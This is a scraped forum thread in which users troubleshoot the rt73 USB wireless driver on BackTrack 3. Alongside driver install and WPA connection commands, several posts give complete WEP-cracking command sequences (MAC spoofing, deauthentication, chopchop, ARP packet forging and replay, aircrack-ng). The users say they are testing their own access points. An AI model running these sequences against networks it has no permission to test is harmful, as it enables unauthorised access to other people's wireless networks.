Yes
No
Getting the rt73 driver to work in BT3final
BT3 final has a few minor issues with our driver that are fairly easy to circumvent and I wanted to share my solutions here. This is a collection of notes and ideas I have put together from my time here and first and foremost I want to thank the community because everything I'm putting here I found from various posts in these very forums.
I would also like to ask you to please remember this is a howto for the RaLink RT73 USB Enhanced Driver. Please keep the discussion in this post relevant and don't ask for support for mundane BT3 tasks.
Now lets begin. Its a good idea to grab a couple things before we get started. The first thing you need to do is get the BT3 kernel sources (thank you shamanvirtuel for delivering me from my noobedness)
and after that you will need the previous version of the aspj driver. (SV yet again infinitely wise)
After you have what you need and you are in BT you can bring down your current interface and driver with
Then you wanna navigate to your folder with the kernel.lzm and typeCode:ifconfig rausb0 down modprobe -r rt73
afterward you can go the the driver folder andCode:lzm2dir kernel.lzm /
now you can bring up the driver and interface withCode:make make install
At this point your wireless card is ready to be put to good use. Iwpriv commands and SpoonWep will now work gloriously! If you are looking to crack wep/wpa with our card use SpoonWep or look here for a tutorial on how do do it with the terminal, if you are looking to connect to a wep encrypted AP use wireless assistant, and if you are trying to connect to wpa/wpa2 use these commands.Code:modprobe rt73 ifconfig rausb0 up
This has worked very well for me and I hope it works for you to. Good luck.Code:ifconfig rausb0 up iwconfig rausb0 mode managed iwconfig rausb0 essid <Your SSID> iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2) *WPA2PSK is for this line only iwpriv rausb0 set WPAPSK=<Your Key> iwpriv rausb0 set EncrypType=TKIP (or AES) dhcpcd rausb0
Please, can you explain what is SpoonDrv? is better?Originally Posted by 0tt0v0nc4t
When Bt3 loads it recognizes that the rt73 driver is loaded and sees the rausb0 interface but will not pick up ap's in any program. The fix I have found is to simply
Or even better... Use SpoonDrv.Code:modprobe -r rt73 modprobe rt73
I too have the Edimax EW-7318USg and just like the OP said, it doesn't work out of the box. I also had to modprobe the adapter for it to work.
I doesn't bother me now, but out of curiosity can any of the dev's explain the reason why the card doesn't work for BT3 Final? It works on BT3beta out of the box.
Edimax EW-7318USg fails to inject
My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it sould work out of the box or try:-
iwpriv rausb0 rfmontx 1
iwpriv rausb0 forceprism 1
iwconfig rausb0 mode monitor
Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.
Try this:
Code:$ airmon-ng stop rausb0 $ ifconfig rausb0 down $ macchanger --mac 00:11:22:33:44:55 rausb0 $ airmon-ng start rausb0 $ airodump-ng rausb0 find the bssid copy the bssid $ airodump-ng -c 1 -w output --bssid <bssid> rausb0 $ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0 $ aireplay-ng -0 5 -a <bssid> rausb0 $ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0 answer yes and wait $ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest $ aireplay-ng -2 -r arprequest rausb0 say yes $ aircrack-ng output-01.cap
speed999, The aircrack wiki for our driver (found here ) Says to try
good luck.Code:iwconfig rausb0 rate 1M
Tried this but 'aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 rausb0' fails after 'Sending Authentication Request' with 'Attack was unsuccessful'. This is the same problem I have when using:-
airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0
aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0
aircrack-ng -b <bssid> capturefile*.ivs
I only get to attempting the fake authentication and it fails! No problem with the same attack using BT2.
Tried ‘iwconfig rausb0 rate 1M’
The fake authentication worked but 'aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0' failed 'the access point does not properly discard frames with an invalid ICV.....'
When I used:-
airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0
aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0
Brilliant and thanks it works!
As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?
Thanks again for everyone’s help
Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work; you will find your answer.
Then increase it by 1dBi each time:Code:iwconfig rausb0 txpower 10
Lucky for you anyway! All day I have been trying to inject my AP with my Edimax and I can't! LOL!Code:iwconfig rausb0 txpower 11
It gets worse, Back|Track does recognize my card, but I tried a LOT of tricks and it was a hit and miss. It took me nearly 3 hours to connect to my AP as the card didn't see any AP's at all!Then when I set my card into monitor mode to test out the funny EzPWN toolset just for a laugh...it didn't see any APs!
I exited EzPWN and loaded airodump-ng, it seen the APs. Then I stopped airodump-ng in order to define my AP in airodump and start injecting...nothing, it didn't even see any AP's. I can not connect to the internet on BackTrack unless I load it, restart it, load it and restart it again. Its very frustrating because it was working perfectly for a while and now I have to hold off my BASE/Snort/With_Graphs tutorial as Im in Windows as its the only way I can connect to my AP.
Incase anyone is wondering, yes I do have a built in Atheros but I am not in my computer room today and the ath0 is crap from my shed. Any help from anyone on this mysterious rt73 problem would be appreciated.
Okay, I am still in Windows [only way to surf at the moment] and I found this on the Aircrack-ng site:
I am going to look into this as soon as I boot back into BT3fThe instructions below reference an older version of the drivers then is available on ASPj's site. This is because the newer version contains some bugs. See the forum threads for details.
I am having strange issues with my card as well. Fortunately I have an intel pro wireless one a laptop so I have been using that to play around on.
First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep(works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1. driver but I have yet to try it.
Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
My previous working method for connecting with my card in BT is no longer working(see code below) and wireless assistant is fail.
My next step is to try the previous aspj driver,drop my encryption to wep, and see if I can connect/scan/exploit ok.Code:ifconfig rausb0 up iwconfig rausb0 mode managed iwconfig rausb0 essid <Your SSID> iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2) iwpriv rausb0 set WPAPSK=<Your Key> iwpriv rausb0 set EncrypType=TKIP (or AES) dhcpcd rausb0
Please post your solutions Denv and I will post any I find as well. Thanks.
I will do, no sweat man. Im on Windows at the moment using my Atheros card, it's nearly 5am and I have been awake for more or less 2 days trying to get BASE working. Not a problem, tomorrow I will troubleshoot my Edimax and post my results here. I also have zero success with Wireless Assistant and SpoonWep, of course CL was my first approach and it 'half' worked and hasn't worked since.
Posting Permissions
